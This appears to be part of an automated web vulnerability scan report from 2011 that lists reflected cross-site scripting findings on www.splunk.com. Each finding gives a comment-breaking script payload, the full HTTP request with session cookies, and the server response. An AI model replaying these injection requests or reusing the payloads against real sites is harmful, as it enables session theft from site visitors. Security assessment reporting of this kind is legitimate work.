<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 68953--><script>alert(1)</script>eaea7d25138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download68953--><script>alert(1)</script>eaea7d25138?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the _kk request parameter is copied into an HTML comment. The payload b7e09--><script>alert(1)</script>f6db6cda9de was submitted in the _kk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20serverb7e09--><script>alert(1)</script>f6db6cda9de&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the _kt request parameter is copied into an HTML comment. The payload 6fcda--><script>alert(1)</script>6096be335ae was submitted in the _kt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c516fcda--><script>alert(1)</script>6096be335ae&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ac request parameter is copied into an HTML comment. The payload 44448--><script>alert(1)</script>cc5249ec1a was submitted in the ac parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix44448--><script>alert(1)</script>cc5249ec1a&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the gclid request parameter is copied into an HTML comment. The payload bb2a7--><script>alert(1)</script>43845f147ee was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHwbb2a7--><script>alert(1)</script>43845f147ee HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.396. http://www.splunk.com/download [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /download
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7e491--><script>alert(1)</script>225df8e69ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&7e491--><script>alert(1)</script>225df8e69ea=1 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the r request parameter is copied into an HTML comment. The payload 762e9--><script>alert(1)</script>2a2b1b2f445 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download?r=header762e9--><script>alert(1)</script>2a2b1b2f445 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 621a81038483aa2a237c87a068e98c5e1296943882 Last-Modified: Sat, 05 Feb 2011 22:11:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 38247
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8c513--><script>alert(1)</script>f33dab4a33e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /8c513--><script>alert(1)</script>f33dab4a33e/appbuilding HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 74c98--><script>alert(1)</script>b9ac1a0b174 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /74c98--><script>alert(1)</script>b9ac1a0b174/appofthemonth HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:15:29 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e9bb93a07abe8059990eb0092b073c0a1297008929 Last-Modified: Sun, 06 Feb 2011 16:15:29 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c48d6--><script>alert(1)</script>3cafe7a8ef7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /c48d6--><script>alert(1)</script>3cafe7a8ef7?module=roles&func=showloginform&redirecturl=http://www.splunk.com/download?ac=Adwords_Unix%26_kk=unix%2520server%26_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid=CPeW6bn_8aYCFcfe4Aod22SxHw%26redirecturl=/download HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:21 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:22 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:22 GMT; path=/ ETag: 4517e0ff5f5b685666852f82b7c214a01296944002 Last-Modified: Sat, 05 Feb 2011 22:13:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.401. http://www.splunk.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5c3ca--><script>alert(1)</script>0dc09c4b0bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?5c3ca--><script>alert(1)</script>0dc09c4b0bd=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:27 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: bae19f4c41b411b260b009a4a27d08691296944068 Last-Modified: Sat, 05 Feb 2011 22:14:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:dc="http://purl.org/d ...[SNIP]... <!-- SID:23 GEN:2011-02-05T14:14:28-08:00 URL:/index.php?5c3ca--><script>alert(1)</script>0dc09c4b0bd=1 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 72f33--><script>alert(1)</script>17142365ccb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php72f33--><script>alert(1)</script>17142365ccb/download_track HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload c3e53--><script>alert(1)</script>1909391eda3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/download_trackc3e53--><script>alert(1)</script>1909391eda3 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c4885--><script>alert(1)</script>2061e00a373 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.phpc4885--><script>alert(1)</script>2061e00a373/sso_checker?return_to=http://splunkbase.splunk.com/account:session/?redir=%2F%3F1ffc5%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E46cc332d1dc%3D1 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://splunkbase.splunk.com/?1ffc5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E46cc332d1dc=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:34:32 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 23:04:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 23:04:33 GMT; path=/ ETag: 5c9daeeefe5e6240c983686742c870771296945273-gzip Last-Modified: Sat, 05 Feb 2011 22:34:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 70637--><script>alert(1)</script>77207d79957 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
